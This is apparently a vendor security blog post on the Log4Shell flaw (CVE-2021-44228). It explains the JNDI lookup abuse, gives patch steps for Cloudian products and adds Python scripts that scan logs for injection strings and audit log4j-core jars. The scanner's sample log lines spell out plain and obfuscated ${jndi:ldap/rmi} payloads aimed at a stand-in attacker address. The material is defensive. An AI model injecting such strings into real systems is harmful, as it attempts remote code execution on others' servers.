As has been widely reported, the Log4j2 software library was recently found to have vulnerabilities. Cloudian took immediate action and has provided patches to our customers to remediate the issue. Data security is a foremost concern at Cloudian, and our customers have been directly advised by the Cloudian Support organization on the steps needed. This blog further explains the issue and outlines the steps that Cloudian has taken.
What is the Log4J Vulnerability?
The originally reported CVE-2021-44228 is a remote code execution (RCE) vulnerability in the Apache Log4j2 software library. It abuses the Java Naming and Directory Interface (JNDI) through a logging feature, enabled by default, called message lookup substitution: when a log message contains text of the form ${lookup:value}, Log4j2 replaces it at logging time with a dynamically generated string. Because the substitution is applied to the message text itself, an attacker who can get such a pattern into a logged message can direct Log4j2 to perform a lookup against an LDAP or other JNDI endpoint that the attacker controls.
One of the lookup methods, the JNDI lookup paired with the LDAP protocol, will contact the named server, and the server's response can point Log4j2 at a Java class hosted on a remote codebase that is then loaded and instantiated (or at a serialized object that is deserialized), executing the attacker's code in the process. This means that if any part of a logged string, such as an HTTP User-Agent header, a request path or a username, can be controlled by a remote attacker, that attacker can gain remote code execution on the application that logged the string.
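The detection check a defender would want next to the explanation above, as an added example written for this post (not Cloudian code): it scans log lines for the lookup pattern after emulating the lower/upper/default-value lookup tricks that attackers nest inside ${...} to hide the literal string "jndi:" from a plain text search. The sample log lines, the 203.0.113.9 address and all function names are constructed for the example.

```python
"""Scan log lines for Log4Shell (CVE-2021-44228) lookup payloads.

Added example for this post, not Cloudian code. It emulates just enough of
Log4j2's nested lookup substitution (${lower:...}, ${upper:...} and the
${name:-default} fallback) to unwrap the obfuscations attackers use to hide
the literal "jndi:" from naive grep searches, then reports the scheme and
target host of each JNDI lookup found.
"""
import re
from typing import Dict, List

# Constructed sample lines (not real traffic): one plain payload, two obfuscated
# ones, a benign request, and a non-JNDI lookup that must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:13:01:03 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.9/b}"',
    '10.0.0.7 - - [10/Dec/2021:13:01:04 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9/c}"',
    '10.0.0.8 - - [10/Dec/2021:13:01:05 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:01:06 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 "curl/7.79.1"',
]

# After normalisation a probe looks like ${jndi:<scheme>://<host[:port]>/...}.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s]*)", re.IGNORECASE)


def _matching_brace(s: str, open_idx: int) -> int:
    """Index of the '}' closing the '{' at open_idx, or -1 if unbalanced."""
    depth = 0
    for j in range(open_idx, len(s)):
        if s[j] == "{":
            depth += 1
        elif s[j] == "}":
            depth -= 1
            if depth == 0:
                return j
    return -1


def _evaluate(inner: str) -> str:
    """Resolve one ${...} whose nested lookups have already been resolved."""
    prefix, _, rest = inner.partition(":")
    key = prefix.strip().lower()
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in inner:                 # ${unknown:-default} falls back to default
        return inner.split(":-", 1)[1]
    return "${" + inner + "}"         # jndi:, env:, date: ... are kept verbatim


def normalize_lookups(s: str) -> str:
    """Rewrite s with nested lower/upper/default lookups evaluated, innermost first."""
    out: List[str] = []
    i = 0
    while i < len(s):
        if s.startswith("${", i):
            end = _matching_brace(s, i + 1)
            if end == -1:             # unbalanced: treat "${" as literal text
                out.append("${")
                i += 2
                continue
            out.append(_evaluate(normalize_lookups(s[i + 2:end])))
            i = end + 1
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per line that contains a JNDI lookup after normalisation."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        match = JNDI_RE.search(normalized)
        if match:
            hits.append({
                "line": number,
                "scheme": match.group(1).lower(),
                "target": match.group(2),
                "normalized": normalized,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(hit)
```

Run it against a copy of any web-server, proxy or application log; the normalized field shows what Log4j2 would have evaluated, which is what you should search for in the logs of every Java service behind that entry point. The fifth sample line shows why the check keys on "jndi:" rather than on "${": non-JNDI lookups appear in ordinary traffic and would otherwise drown the alert in noise.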
Who is at Risk?
Attackers are actively exploiting this CVSS 10.0 critical vulnerability. There appear to be no specific targets: nation-state actors and various known hacking groups are taking a shotgun approach, attempting to compromise anyone they can reach.
Because of the potential reach and severity of such a remote code execution, security researchers are emphasizing the need to take action. Only a single crafted string, placed anywhere that ends up in a log message, is required to exploit the vulnerability.
Cloudian’s Actions and Recommendations
Cloudian has responded to the threat of exploitation of a critical remote code execution (RCE) vulnerability, CVE-2021-44228, in Apache's Log4j software library, versions 2.0-beta9 through 2.14.1, commonly called the "Log4Shell" vulnerability.
Cloudian customers should take the following action:
- HyperFile and HyperIQ: No action required. These products do not use the Log4J libraries.
- Customers running HS 7.1.x or older should immediately upgrade to a newer version.
- Customers running HS 7.2.x or newer should immediately apply the patch now available on the Cloudian Support Portal:
- Article 2627 – [SECURITY] Upgrade Log4j library for CVE-2021-44228, CVE-2021-45046, CVE-2021-45105
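Once the upgrade or patch has been applied, verify it. The following is an added example written for this post (not part of Cloudian's patch or support tooling): it finds every log4j-core jar under a directory tree, reads the version from the jar manifest (falling back to the file name), and reports whether it is at or above 2.17.0, the main-branch 2.x release that closes the three CVEs listed in Article 2627, and whether JndiLookup.class is still present. The 2.17.0 threshold is an assumption that applies to the 2.x main branch only (the 2.12.x and 2.3.x branches for older Java have their own fixed releases). The demo() function builds throwaway stand-in jars so the script can be run offline; the jar names and the version strings inside them are constructed.

```python
"""Inventory log4j-core jars under a directory and report their patch status.

Added example for this post, not Cloudian code. Assumption: on the 2.x main
branch, 2.17.0 closes CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105; the
2.12.x (Java 7) and 2.3.x (Java 6) branches are not modelled here.
"""
import os
import re
import shutil
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 17, 0)          # assumption, see module docstring
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def _version_from_manifest(jar: zipfile.ZipFile) -> Optional[Tuple[int, ...]]:
    """Parse Implementation-Version from META-INF/MANIFEST.MF, if present."""
    try:
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.lower().startswith("implementation-version:"):
            match = VERSION_RE.search(line)
            if match:
                return tuple(int(g) for g in match.groups())
    return None


def inspect_jar(path: str) -> Dict[str, object]:
    """Version, presence of JndiLookup.class and fixed/not-fixed for one jar."""
    with zipfile.ZipFile(path) as jar:
        version = _version_from_manifest(jar)
        if version is None:             # fall back to the version in the file name
            match = VERSION_RE.search(os.path.basename(path))
            version = tuple(int(g) for g in match.groups()) if match else None
        has_jndi_lookup = JNDI_LOOKUP_CLASS in jar.namelist()
    fixed = version is not None and version >= FIXED_VERSION
    return {"path": path, "version": version,
            "has_jndi_lookup": has_jndi_lookup, "fixed": fixed}


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Walk root and inspect every log4j-core*.jar found, sorted by path."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                results.append(inspect_jar(os.path.join(dirpath, name)))
    return sorted(results, key=lambda r: str(r["path"]))


def make_sample_jar(path: str, version: str, with_jndi_lookup: bool) -> None:
    """Constructed stand-in for a log4j-core jar: a manifest plus, optionally,
    an empty placeholder entry where JndiLookup.class would live."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     "Manifest-Version: 1.0\r\nImplementation-Version: %s\r\n" % version)
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")


def demo() -> List[Dict[str, object]]:
    """Build three constructed jars in a temp dir, scan them, clean up."""
    root = tempfile.mkdtemp(prefix="log4j-audit-")
    try:
        os.makedirs(os.path.join(root, "app", "lib"))
        make_sample_jar(os.path.join(root, "app", "lib", "log4j-core-2.14.1.jar"), "2.14.1", True)
        make_sample_jar(os.path.join(root, "app", "log4j-core-2.17.0.jar"), "2.17.0", True)
        # Vulnerable version with JndiLookup.class removed: still reported as not fixed.
        make_sample_jar(os.path.join(root, "log4j-core-2.14.1-nojndi.jar"), "2.14.1", False)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    import sys
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for result in results:
        print(result)
```

Point it at the installation root of each node (python3 script.py /opt) rather than trusting a package version alone: a jar with JndiLookup.class stripped out is a mitigation, not an upgrade, and is deliberately still reported as not fixed. Jars bundled inside WAR or EAR archives or shaded into other jars are not found by this file-name match and need a separate sweep.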
Additional Information and Resources
The following Cloudian Knowledge Base Articles are published as Security Advisories and are available to registered customers through the Cloudian Support Portal at https://cloudian-support.force.com.
- KBA# 2625 https://cloudian-support.force.com/s/article/SECURITY-Cloudian-HyperStore-Log4j-vulnerability-CVE-2021-44228
- KBA# 2627 https://cloudian-support.force.com/s/article/SECURITY-Upgrade-Log4j-library-for-CVE-2021-44228